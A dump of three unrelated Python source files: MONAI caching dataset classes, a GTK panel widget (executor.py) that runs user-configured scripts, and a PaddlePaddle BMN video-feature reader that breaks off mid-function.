CacheNTransDataset(PersistentDataset): """ Extension of `PersistentDataset`, tt can also cache the result of first N transforms, no matter it's random or not. """ def __init__( self, data: Sequence, transform: Union[Sequence[Callable], Callable], cache_n_trans: int, cache_dir: Optional[Union[Path, str]], hash_func: Callable[..., bytes] = pickle_hashing, ) -> None: """ Args: data: input data file paths to load and transform to generate dataset for model. `PersistentDataset` expects input data to be a list of serializable and hashes them as cache keys using `hash_func`. transform: transforms to execute operations on input data. cache_n_trans: cache the result of first N transforms. cache_dir: If specified, this is the location for persistent storage of pre-computed transformed data tensors. The cache_dir is computed once, and persists on disk until explicitly removed. Different runs, programs, experiments may share a common cache dir provided that the transforms pre-processing is consistent. If `cache_dir` doesn't exist, will automatically create it. If `cache_dir` is `None`, there is effectively no caching. hash_func: a callable to compute hash from data items to be cached. defaults to `monai.data.utils.pickle_hashing`. """ super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func) self.cache_n_trans = cache_n_trans def _pre_transform(self, item_transformed): """ Process the data from original state up to the N element. Args: item_transformed: The data to be transformed Returns: the transformed element up to the N transform object """ if not isinstance(self.transform, Compose): raise ValueError("transform must be an instance of monai.transforms.Compose.") for i, _transform in enumerate(self.transform.transforms): if i == self.cache_n_trans: break _xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform item_transformed = apply_transform(_xform, item_transformed) return item_transformed def _post_transform(self, item_transformed): """ Process the data from before the N + 1 transform to the final state ready for evaluation. Args: item_transformed: The data to be transformed (already processed up to the first N transform) Returns: the final transformed result """ if not isinstance(self.transform, Compose): raise ValueError("transform must be an instance of monai.transforms.Compose.") for i, _transform in enumerate(self.transform.transforms): if i >= self.cache_n_trans: item_transformed = apply_transform(_transform, item_transformed) return item_transformed class LMDBDataset(PersistentDataset): """ Extension of `PersistentDataset` using LMDB as the backend. See Also: :py:class:`monai.data.PersistentDataset` Examples: >>> items = [{"data": i} for i in range(5)] # [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}] >>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1)) >>> print(list(lmdb_ds)) # using the cached results """ def __init__( self, data: Sequence, transform: Union[Sequence[Callable], Callable], cache_dir: Union[Path, str] = "cache", hash_func: Callable[..., bytes] = pickle_hashing, db_name: str = "monai_cache", progress: bool = True, pickle_protocol=pickle.HIGHEST_PROTOCOL, lmdb_kwargs: Optional[dict] = None, ) -> None: """ Args: data: input data file paths to load and transform to generate dataset for model. `LMDBDataset` expects input data to be a list of serializable and hashes them as cache keys using `hash_func`. transform: transforms to execute operations on input data. cache_dir: if specified, this is the location for persistent storage of pre-computed transformed data tensors. The cache_dir is computed once, and persists on disk until explicitly removed. Different runs, programs, experiments may share a common cache dir provided that the transforms pre-processing is consistent. If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache". hash_func: a callable to compute hash from data items to be cached. defaults to `monai.data.utils.pickle_hashing`. db_name: lmdb database file name. Defaults to "monai_cache". progress: whether to display a progress bar. pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL. https://docs.python.org/3/library/pickle.html#pickle-protocols lmdb_kwargs: additional keyword arguments to the lmdb environment. for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class """ super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func) self.progress = progress if not self.cache_dir: raise ValueError("cache_dir must be specified.") self.db_file = self.cache_dir / f"{db_name}.lmdb" self.pickle_protocol = pickle_protocol self.lmdb_kwargs = lmdb_kwargs or {} if not self.lmdb_kwargs.get("map_size", 0): self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size self._read_env = None print(f"Accessing lmdb file: {self.db_file.absolute()}.") def _fill_cache_start_reader(self): # create cache self.lmdb_kwargs["readonly"] = False env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs) if self.progress and not has_tqdm: warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.") for item in tqdm(self.data) if has_tqdm and self.progress else self.data: key = self.hash_func(item) done, retry, val = False, 5, None while not done and retry > 0: try: with env.begin(write=True) as txn: with txn.cursor() as cursor: done = cursor.set_key(key) if done: continue if val is None: val = self._pre_transform(deepcopy(item)) # keep the original hashed val = pickle.dumps(val, protocol=self.pickle_protocol) txn.put(key, val) done = True except lmdb.MapFullError: done, retry = False, retry - 1 size = env.info()["map_size"] new_size = size * 2 warnings.warn(f"Resizing the cache database from {int(size) >> 20}MB to {int(new_size) >> 20}MB.") env.set_mapsize(new_size) except lmdb.MapResizedError: # the mapsize is increased by another process # set_mapsize with a size of 0 to adopt the new size, env.set_mapsize(0) if not done: # still has the map full error size = env.info()["map_size"] env.close() raise ValueError(f"LMDB map size reached, increase size above current size of {size}.") size = env.info()["map_size"] env.close() # read-only database env self.lmdb_kwargs["readonly"] = True self.lmdb_kwargs["map_size"] = size if self.lmdb_kwargs.get("lock", None) is None: self.lmdb_kwargs["lock"] = False if self.lmdb_kwargs.get("readahead", None) is None: self.lmdb_kwargs["readahead"] = False return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs) def _cachecheck(self, item_transformed): """ if the item is not found in the lmdb file, resolves to the persistent cache default behaviour. """ if self._read_env is None: self._read_env = self._fill_cache_start_reader() with self._read_env.begin(write=False) as txn: data = txn.get(self.hash_func(item_transformed)) if data is None: warnings.warn("LMDBDataset: cache key not found, running fallback caching.") return super()._cachecheck(item_transformed) try: return pickle.loads(data) except Exception as err: raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err def info(self): """ Returns: dataset info dictionary. """ if self._read_env is None: self._read_env = self._fill_cache_start_reader() out = dict(self._read_env.info()) out["size"] = len(self.data) out["filename"] = f"{self.db_file.absolute()}" return out class CacheDataset(Dataset): """ Dataset with cache mechanism that can load data and cache deterministic transforms' result during training. By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline. If the requested data is not in the cache, all transforms will run normally (see also :py:class:`monai.data.dataset.Dataset`). Users can set the cache rate or number of items to cache. It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed. To improve the caching efficiency, please always put as many as possible non-random transforms before the randomized ones when composing the chain of transforms. If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`, for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset For example, if the transform is a `Compose` of:: transforms = Compose([ LoadImaged(), AddChanneld(), Spacingd(), Orientationd(), ScaleIntensityRanged(), RandCropByPosNegLabeld(), ToTensord() ]) when `transforms` is used in a multi-epoch training pipeline, before the first training epoch, this dataset will cache the results up to ``ScaleIntensityRanged``, as all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged` can be cached. During training, the dataset will load the cached results and run ``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform and the outcome not cached. Note: `CacheDataset` executes non-random transforms and prepares cache content in the main process before the first epoch, then all the subprocesses of DataLoader will read the same cache content in the main process during training. it may take a long time to prepare cache content according to the size of expected cache data. So to debug or verify the program before real training, users can set `cache_rate=0.0` or `cache_num=0` to temporarily skip caching. """ def __init__( self, data: Sequence, transform: Union[Sequence[Callable], Callable], cache_num: int = sys.maxsize, cache_rate: float = 1.0, num_workers: Optional[int] = None, progress: bool = True, ) -> None: """ Args: data: input data to load and transform to generate dataset for model. transform: transforms to execute operations on input data. cache_num: number of items to be cached. Default is `sys.maxsize`. will take the minimum of (cache_num, data_length x cache_rate, data_length). cache_rate: percentage of cached data in total, default is 1.0 (cache all). will take the minimum of (cache_num, data_length x cache_rate, data_length). num_workers: the number of worker processes to use. If num_workers is None then the number returned by os.cpu_count() is used. progress: whether to display a progress bar. """ if not isinstance(transform, Compose): transform = Compose(transform) super().__init__(data=data, transform=transform) self.progress = progress self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data)) self.num_workers = num_workers if self.num_workers is not None: self.num_workers = max(int(self.num_workers), 1) self._cache: List = self._fill_cache() def _fill_cache(self) -> List: if self.cache_num <= 0: return [] if self.progress and not has_tqdm: warnings.warn("tqdm is not installed, will not show the caching progress bar.") with ThreadPool(self.num_workers) as p: if self.progress and has_tqdm: return list( tqdm( p.imap(self._load_cache_item, range(self.cache_num)), total=self.cache_num, desc="Loading dataset", ) ) return list(p.imap(self._load_cache_item, range(self.cache_num))) def _load_cache_item(self, idx: int): """ Args: idx: the index of the input data sequence. """ item = self.data[idx] for _transform in self.transform.transforms: # type:ignore # execute all the deterministic transforms if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform): break _xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform item = apply_transform(_xform, item) return item def _transform(self, index: int): if index % len(self) >= self.cache_num: # support negative index # no cache for this index, execute all the transforms directly return super()._transform(index) # load data from cache and execute from the first random transform start_run = False if self._cache is None: self._cache = self._fill_cache() data = self._cache[index] if not isinstance(self.transform, Compose): raise ValueError("transform must be an instance of monai.transforms.Compose.") for _transform in self.transform.transforms: if start_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform): # only need to deep copy data on first non-deterministic transform if not start_run: start_run = True data = deepcopy(data) data = apply_transform(_transform, data) return data class SmartCacheDataset(Randomizable, CacheDataset): """ Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK. At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items in the cache are used for training. This ensures that data needed for training is readily available, keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic transform sequence before being fed to GPU. At the same time, another thread is preparing replacement items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart Cache replaces the same number of items with replacement items. Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items. Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r), where r is the configured replace rate). For more details, please refer to: https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`, for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, and `cache_num=4`, `replace_rate=0.25`. so the actual training images cached and replaced for every epoch are as below:: epoch 1: [image1, image2, image3, image4] epoch 2: [image2, image3, image4, image5] epoch 3: [image3, image4, image5, image1] epoch 3: [image4, image5, image1, image2] epoch N: [image[N % 5] ...] The usage of `SmartCacheDataset` contains 4 steps: 1. Initialize `SmartCacheDataset` object and cache for the first epoch. 2. Call `start()` to run replacement thread in background. 3. Call `update_cache()` before every epoch to replace training items. 4. Call `shutdown()` when training ends. Note: This replacement will not work for below cases: 1. Set the `multiprocessing_context` of DataLoader to `spawn`. 2. Run on windows(the default multiprocessing method is `spawn`) with `num_workers` greater than 0. 3. Set the `persistent_workers` of DataLoader to `True` with `num_workers` greater than 0. If using MONAI workflows, please add `SmartCacheHandler` to the handler list of trainer, otherwise, please make sure to call `start()`, `update_cache()`, `shutdown()` during training. Args: data: input data to load and transform to generate dataset for model. transform: transforms to execute operations on input data. replace_rate: percentage of the cached items to be replaced in every epoch. cache_num: number of items to be cached. Default is `sys.maxsize`. will take the minimum of (cache_num, data_length x cache_rate, data_length). cache_rate: percentage of cached data in total, default is 1.0 (cache all). will take the minimum of (cache_num, data_length x cache_rate, data_length). num_init_workers: the number of worker threads to initialize the cache for first epoch. If num_init_workers is None then the number returned by os.cpu_count() is used. num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch. If num_replace_workers is None then the number returned by os.cpu_count() is used. progress: whether to display a progress bar when caching for the first epoch. shuffle: whether to shuffle the whole data list before preparing the cache content for first epoch. seed: random seed if shuffle is `True`, default to `0`. """ def __init__( self, data: Sequence, transform: Union[Sequence[Callable], Callable], replace_rate: float, cache_num: int = sys.maxsize, cache_rate: float = 1.0, num_init_workers: Optional[int] = None, num_replace_workers: Optional[int] = None, progress: bool = True, shuffle: bool = True, seed: int = 0, ) -> None: if shuffle: self.set_random_state(seed=seed) self.randomize(data) super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress) if self._cache is None: self._cache = self._fill_cache() if self.cache_num >= len(data): warnings.warn( "cache_num is greater or equal than dataset length, fall back to regular monai.data.CacheDataset." ) if replace_rate <= 0: raise ValueError("replace_rate must be greater than 0, otherwise, please use monai.data.CacheDataset.") self.num_replace_workers: Optional[int] = num_replace_workers if self.num_replace_workers is not None: self.num_replace_workers = max(int(self.num_replace_workers), 1) self._total_num: int = len(data) self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num) self._replacements: List[Any] = [None for _ in range(self._replace_num)] self._replace_data_idx: List[int] = list(range(self._replace_num)) self._start_pos: int = 0 self._update_lock: threading.Lock = threading.Lock() self._round: int = 1 self._replace_done: bool = False self._replace_mgr: Optional[threading.Thread] = None self._compute_data_idx() def randomize(self, data: Sequence) -> None: try: self.R.shuffle(data) except TypeError as e: warnings.warn(f"input data can't be shuffled in SmartCacheDataset with numpy.random.shuffle(): {e}.") def _compute_data_idx(self): """ Update the replacement data position in the total data. """ for i in range(self._replace_num): pos: int = self._start_pos + self.cache_num + i if pos >= self._total_num: pos -= self._total_num self._replace_data_idx[i] = pos def is_started(self): """ Check whether the replacement thread is already started. """ if self._replace_mgr is None: return False return self._replace_mgr.is_alive() def start(self): """ Start the background thread to replace training items for every epoch. """ if self._replace_mgr is None or not self.is_started(): self._restart() def _restart(self): """ Restart background thread if killed for some reason. """ self._round = 1 self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True) self._replace_mgr.start() def _try_update_cache(self): """ Update the cache items with new replacement for current epoch. """ with self._update_lock: if not self._replace_done: return False del self._cache[: self._replace_num] self._cache.extend(self._replacements) self._start_pos += self._replace_num if self._start_pos >= self._total_num: self._start_pos -= self._total_num self._compute_data_idx() # ready for next round self._round += 1 self._replace_done = False return True def update_cache(self): """ Update cache items for current epoch, need to call this function before every epoch. If the cache has been shutdown before, need to restart the `_replace_mgr` thread. """ if not self._replace_mgr.is_alive(): self._restart() # make sure update is done while not self._try_update_cache(): time.sleep(0.01) def _try_shutdown(self): """ Wait for thread lock to shut down the background thread. """ with self._update_lock: if self._replace_done: self._round = 0 self._replace_done = False return True return False def shutdown(self): """ Shut down the background thread for replacement. """ if not self.is_started(): return # wait until replace mgr is done the current round while not self._try_shutdown(): time.sleep(0.01) self._replace_mgr.join() def _replace_cache_thread(self, index: int): """ Execute deterministic transforms on the new data for replacement. """ pos: int = self._replace_data_idx[index] self._replacements[index] = self._load_cache_item(pos) def _compute_replacements(self): """ Compute expected items for the replacement of next epoch, execute deterministic transforms. It can support multi-threads to accelerate the computation progress. """ with ThreadPool(self.num_replace_workers) as p: p.map(self._replace_cache_thread, list(range(self._replace_num))) self._replace_done = True def _try_manage_replacement(self, check_round): """ Wait thread lock and replace training items in the background thread. """ with self._update_lock: if self._round <= 0: # shutdown replacement self._replace_done = True return True, -1 if self._round != check_round: self._compute_replacements() return False, self._round def manage_replacement(self): """ Background thread for replacement. """ check_round: int = -1 done = False while not done: done, check_round = self._try_manage_replacement(check_round) time.sleep(0.01) def __len__(self): """ The dataset length is given by cache_num instead of len(data). """ return self.cache_num class ZipDataset(Dataset): """ Zip several PyTorch datasets and output data(with the same index) together in a tuple. If the output of single dataset is already a tuple, flatten it and extend to the result. For example: if datasetA returns (img, imgmeta), datasetB returns (seg, segmeta), finally return (img, imgmeta, seg, segmeta). And if the datasets don't have same length, use the minimum length of them as the length of ZipDataset. If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`, for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset Examples:: >>> zip_data = ZipDataset([[1, 2, 3], [4, 5]]) >>> print(len(zip_data)) 2 >>> for item in zip_data: >>> print(item) [1, 4] [2, 5] """ def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None: """ Args: datasets: list of datasets to zip together. transform: a callable data transform operates on the zipped item from `datasets`. """ super().__init__(list(datasets), transform=transform) def __len__(self) -> int: return min((len(dataset) for dataset in self.data)) def _transform(self, index: int): def to_list(x): return list(x) if isinstance(x, (tuple, list)) else [x] data = [] for dataset in self.data: data.extend(to_list(dataset[index])) if self.transform is not None: data = apply_transform(self.transform, data, map_items=False) # transform the list data # use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists return tuple(data) class ArrayDataset(Randomizable, _TorchDataset): """ Dataset for segmentation and classification tasks based on array format input data and transforms. It ensures the same random seeds in the randomized transforms defined for image, segmentation and label. The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object. For example: If train based on Nifti format images without metadata, all transforms can be composed:: img_transform = Compose( [ LoadImage(image_only=True), AddChannel(), RandAdjustContrast() ] ) ArrayDataset(img_file_list, img_transform=img_transform) If training based on images and the metadata, the array transforms can not be composed because several transforms receives multiple parameters or return multiple values. Then Users need to define their own callable method to parse metadata from `LoadImage` or set `affine` matrix to `Spacing` transform:: class TestCompose(Compose): def __call__(self, input_): img, metadata = self.transforms[0](input_) img = self.transforms[1](img) img, _, _ = self.transforms[2](img, metadata["affine"]) return self.transforms[3](img), metadata img_transform = TestCompose( [ LoadImage(image_only=False), AddChannel(), Spacing(pixdim=(1.5, 1.5, 3.0)), RandAdjustContrast() ] ) ArrayDataset(img_file_list, img_transform=img_transform) Examples:: >>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1) >>> print(ds[0]) 1.1 >>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8]) >>> print(ds[0]) [1, 5] """ def __init__( self, img: Sequence, img_transform: Optional[Callable] = None, seg: Optional[Sequence] = None, seg_transform: Optional[Callable] = None, labels: Optional[Sequence] = None, label_transform: Optional[Callable] = None, ) -> None: """ Initializes the dataset with the filename lists. The transform `img_transform` is applied to the images and `seg_transform` to the segmentations. Args: img: sequence of images. img_transform: transform to apply to each element in `img`. seg: sequence of segmentations. seg_transform: transform to apply to each element in `seg`. labels: sequence of labels. label_transform: transform to apply to each element in `labels`. """ items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)] self.set_random_state(seed=get_seed()) datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None] self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets) self._seed = 0 # transform synchronization seed def __len__(self) -> int: return len(self.dataset) def randomize(self, data: Optional[Any] = None) -> None: self._seed = self.R.randint(MAX_SEED, dtype="uint32") def __getitem__(self, index: int): self.randomize() if isinstance(self.dataset, ZipDataset): # set transforms of each zip component for dataset in self.dataset.data: transform = getattr(dataset, "transform", None) if isinstance(transform, Randomizable): transform.set_random_state(seed=self._seed) transform = getattr(self.dataset, "transform", None) if isinstance(transform, Randomizable): transform.set_random_state(seed=self._seed) return self.dataset[index] class NPZDictItemDataset(Dataset): """ Represents a dataset from a loaded NPZ file. The members of the file to load are named in the keys of `keys` and stored under the keyed name. All loaded arrays must have the same 0-dimension (batch) size. Items are always dicts mapping names to an item extracted from the loaded arrays. If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`, for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset Args: npzfile: Path to .npz file or stream containing .npz file data keys: Maps keys to load from file to name to store in dataset transform: Transform to apply to batch dict other_keys: secondary data to load from file and store in dict `other_keys`, not returned by __getitem__ """ def __init__( self, npzfile: Union[str, IO], keys: Dict[str, str], transform: Optional[Callable] = None, other_keys: Optional[Sequence[str]] = (), ): self.npzfile: Union[str, IO] = npzfile if isinstance(npzfile, str) else "STREAM" self.keys: Dict[str, str] = dict(keys) dat = np.load(npzfile) self.arrays = {storedk: dat[datak] for datak, storedk in self.keys.items()} self.length = self.arrays[first(self.keys.values())].shape[0] self.other_keys = {} if other_keys is None else {k: dat[k] for k in other_keys} for k, v in self.arrays.items(): if v.shape[0] != self.length: raise ValueError( "All loaded arrays must have the same first dimension " f"size {self.length}, array `{k}` has size {v.shape[0]}" ) super().__init__([], transform) def __len__(self): return self.length def _transform(self, index: int): data = {k: v[index] for k, v in self.arrays.items()} if self.transform is not None: data = apply_transform(self.transform, data) return data class CSVDataset(Dataset): """ Dataset to load data from CSV files and generate a list of dictionaries, every dictionay maps to a row of the CSV file, and the keys of dictionary map to the column names of the CSV file. It can load multiple CSV files and join the tables with addtional `kwargs` arg. Support to only load specific rows and columns. And it can also group several loaded columns to generate a new column, for example, set `col_groups={"meta": ["meta_0", "meta_1", "meta_2"]}`, output can be:: [ {"image": "./image0.nii", "meta_0": 11, "meta_1": 12, "meta_2": 13, "meta": [11, 12, 13]}, {"image": "./image1.nii", "meta_0": 21, "meta_1": 22, "meta_2": 23, "meta": [21, 22, 23]}, ] Args: filename: the filename of expected CSV file to load. if providing a list of filenames, it will load all the files and join tables. row_indices: indices of the expected rows to load. it should be a list, every item can be a int number or a range `[start, end)` for the indices. for example: `row_indices=[[0, 100], 200, 201, 202, 300]`. if None, load all the rows in the file. col_names: names of the expected columns to load. if None, load all the columns. col_types: `type` and `default value` to convert the loaded columns, if None, use original data. it should be a dictionary, every item maps to an expected column, the `key` is the column name and the `value` is None or a dictionary to define the default value and data type. the supported keys in dictionary are: ["type", "default"]. for example:: col_types = { "subject_id": {"type": str}, "label": {"type": int, "default": 0}, "ehr_0": {"type": float, "default": 0.0}, "ehr_1": {"type": float, "default": 0.0}, "image": {"type": str, "default": None}, } col_groups: args to group the loaded columns to generate a new column, it should be a dictionary, every item maps to a group, the `key` will be the new column name, the `value` is the names of columns to combine. for example: `col_groups={"ehr": [f"ehr_{i}" for i in range(10)], "meta": ["meta_1", "meta_2"]}` transform: transform to apply on the loaded items of a dictionary data. kwargs: additional arguments for `pandas.merge()` API to join tables. """ def __init__( self, filename: Union[str, Sequence[str]], row_indices: Optional[Sequence[Union[int, str]]] = None, col_names: Optional[Sequence[str]] = None, col_types: Optional[Dict[str, Optional[Dict[str, Any]]]] = None, col_groups: Optional[Dict[str, Sequence[str]]] = None, transform: Optional[Callable] = None, **kwargs, ): files = ensure_tuple(filename) dfs = [pd.read_csv(f) for f in files] data = convert_tables_to_dicts( dfs=dfs, row_indices=row_indices, col_names=col_names, col_types=col_types, col_groups=col_groups, **kwargs, ) super().__init__(data=data, transform=transform)
executor.py
#!/usr/bin/env python3 from gi.repository import GLib import subprocess import threading from nwg_panel.tools import check_key, update_image import gi gi.require_version('Gtk', '3.0') gi.require_version('Gdk', '3.0') from gi.repository import Gtk, Gdk, GdkPixbuf class Executor(Gtk.EventBox): def __init__(self, settings, icons_path): self.settings = settings self.icons_path = icons_path Gtk.EventBox.__init__(self) self.box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0) self.add(self.box) self.image = Gtk.Image() self.label = Gtk.Label("") self.icon_path = None check_key(settings, "script", "") check_key(settings, "interval", 0) check_key(settings, "css-name", "") check_key(settings, "icon-placement", "left") check_key(settings, "icon-size", 16) check_key(settings, "tooltip-text", "") check_key(settings, "on-left-click", "") check_key(settings, "on-right-click", "") check_key(settings, "on-middle-click", "") check_key(settings, "on-scroll-up", "") check_key(settings, "on-scroll-down", "") update_image(self.image, "view-refresh-symbolic", self.settings["icon-size"], self.icons_path) if settings["css-name"]: self.label.set_property("name", settings["css-name"]) else: self.label.set_property("name", "executor-label") if settings["tooltip-text"]: self.set_tooltip_text(settings["tooltip-text"]) if settings["on-left-click"] or settings["on-right-click"] or settings["on-middle-click"] or settings[ "on-scroll-up"] or settings["on-scroll-down"]: self.connect('button-press-event', self.on_button_press) self.add_events(Gdk.EventMask.SCROLL_MASK) self.connect('scroll-event', self.on_scroll) self.connect('enter-notify-event', self.on_enter_notify_event) self.connect('leave-notify-event', self.on_leave_notify_event) self.build_box() self.refresh() if settings["interval"] > 0: Gdk.threads_add_timeout_seconds(GLib.PRIORITY_LOW, settings["interval"], self.refresh) def update_widget(self, output): if output: if len(output) == 1: if output[0].endswith(".svg") or output[0].endswith(".png"): new_path = output[0].strip() if new_path != self.icon_path: if "/" not in new_path and "." not in new_path: # name given instead of path update_image(self.image, new_path, self.settings["icon-size"], self.icons_path) self.icon_path = new_path else: try: pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size( new_path, self.settings["icon-size"], self.settings["icon-size"]) self.image.set_from_pixbuf(pixbuf) self.icon_path = new_path except: print("Failed setting image from {}".format(output[0].strip())) if not self.image.get_visible(): self.image.show() if self.label.get_visible(): self.label.hide() else: if self.image.get_visible(): self.image.hide() self.label.set_text(output[0].strip()) if not self.label.get_visible(): self.label.show() elif len(output) == 2: new_path = output[0].strip() if "/" not in new_path and "." not in new_path: # name given instead of path update_image(self.image, new_path, self.settings["icon-size"], self.icons_path) self.icon_path = new_path else: if new_path != self.icon_path: try: pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size( new_path, self.settings["icon-size"], self.settings["icon-size"]) self.image.set_from_pixbuf(pixbuf) self.icon_path = new_path except: print("Failed setting image from {}".format(output[0].strip())) if not self.image.get_visible(): self.image.show() self.label.set_text(output[1].strip()) else: if self.image.get_visible(): self.image.hide() if self.label.get_visible(): self.label.hide() return False def get_output(self): if "script" in self.settings and self.settings["script"]: try: output = subprocess.check_output(self.settings["script"].split()).decode("utf-8").splitlines() GLib.idle_add(self.update_widget, output) except Exception as e: print(e) def refresh(self): thread = threading.Thread(target=self.get_output) thread.daemon = True thread.start() return True def build_box(self): if self.settings["icon-placement"] == "left": self.box.pack_start(self.image, False, False, 2) self.box.pack_start(self.label, False, False, 2) if self.settings["icon-placement"] != "left": self.box.pack_start(self.image, False, False, 2) def on_enter_notify_event(self, widget, event): self.get_style_context().set_state(Gtk.StateFlags.SELECTED) def on_leave_notify_event(self, widget, event): self.get_style_context().set_state(Gtk.StateFlags.NORMAL) def on_button_press(self, widget, event): if event.button == 1 and self.settings["on-left-click"]: self.launch(self.settings["on-left-click"]) elif event.button == 2 and self.settings["on-middle-click"]: self.launch(self.settings["on-middle-click"]) elif event.button == 3 and self.settings["on-right-click"]: self.launch(self.settings["on-right-click"]) def on_scroll(self, widget, event): if event.direction == Gdk.ScrollDirection.UP and self.settings["on-scroll-up"]: self.launch(self.settings["on-scroll-up"]) elif event.direction == Gdk.ScrollDirection.DOWN and self.settings["on-scroll-up"]: self.launch(self.settings["on-scroll-up"]) else: print("No command assigned") def launch(self, cmd): print("Executing '{}'".format(cmd)) subprocess.Popen('exec {}'.format(cmd), shell=True)
reader.py
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve. # #Licensed under the Apache License, Version 2.0 (the "License"); #you may not use this file except in compliance with the License. #You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing permissions and #limitations under the License. import paddle import numpy as np import random import json import multiprocessing import functools import logging import platform import os logger = logging.getLogger(__name__) from bmn_utils import iou_with_anchors, ioa_with_anchors class BMNReader(): def __init__(self, mode, cfg): self.mode = mode self.tscale = cfg.MODEL.tscale # 100 self.dscale = cfg.MODEL.dscale # 100 self.anno_file = cfg.MODEL.anno_file self.file_list = cfg.INFER.filelist self.subset = cfg[mode.upper()]['subset'] self.tgap = 1. / self.tscale self.feat_path = cfg.MODEL.feat_path self.get_dataset_dict() self.get_match_map() self.batch_size = cfg[mode.upper()]['batch_size'] self.num_threads = cfg[mode.upper()]['num_threads'] if (mode == 'test') or (mode == 'infer'): self.num_threads = 1 # set num_threads as 1 for test and infer def get_dataset_dict(self): assert (os.path.exists(self.feat_path)), "Input feature path not exists" assert (os.listdir(self.feat_path)), "No feature file in feature path" self.video_dict = {} if self.mode == "infer": annos = json.load(open(self.file_list)) for video_name in annos.keys(): self.video_dict[video_name] = annos[video_name] else: annos = json.load(open(self.anno_file)) for video_name in annos.keys(): video_subset = annos[video_name]["subset"] if self.subset in video_subset: self.video_dict[video_name] = annos[video_name] self.video_list = list(self.video_dict.keys()) self.video_list.sort() print("%s subset video numbers: %d" % (self.subset, len(self.video_list))) video_name_set = set( [video_name + '.npy' for video_name in self.video_list]) assert (video_name_set.intersection(set(os.listdir(self.feat_path))) == video_name_set), "Input feature not exists in feature path" def get_match_map(self): match_map = [] for idx in range(self.tscale): tmp_match_window = [] xmin = self.tgap * idx for jdx in range(1, self.tscale + 1): xmax = xmin + self.tgap * jdx tmp_match_window.append([xmin, xmax]) match_map.append(tmp_match_window) match_map = np.array(match_map) match_map = np.transpose(match_map, [1, 0, 2]) match_map = np.reshape(match_map, [-1, 2]) self.match_map = match_map self.anchor_xmin = [self.tgap * i for i in range(self.tscale)] self.anchor_xmax = [self.tgap * i for i in range(1, self.tscale + 1)] def get_video_label(self, video_name): video_info = self.video_dict[video_name] video_second = video_info['duration_second'] video_labels = video_info['annotations'] gt_bbox = [] gt_iou_map = [] for gt in video_labels: tmp_start = max(min(1, gt["segment"][0] / video_second), 0) tmp_end = max(min(1, gt["segment"][1] / video_second), 0) gt_bbox.append([tmp_start, tmp_end]) tmp_gt_iou_map = iou_with_anchors( self.match_map[:, 0], self.match_map[:, 1], tmp_start, tmp_end) tmp_gt_iou_map = np.reshape(tmp_gt_iou_map, [self.dscale, self.tscale]) gt_iou_map.append(tmp_gt_iou_map) gt_iou_map = np.array(gt_iou_map) gt_iou_map = np.max(gt_iou_map, axis=0) gt_bbox = np.array(gt_bbox) gt_xmins = gt_bbox[:, 0] gt_xmaxs = gt_bbox[:, 1] gt_len_small = 3 * self.tgap gt_start_bboxs = np.stack( (gt_xmins - gt_len_small / 2, gt_xmins + gt_len_small / 2), axis=1) gt_end_bboxs = np.stack( 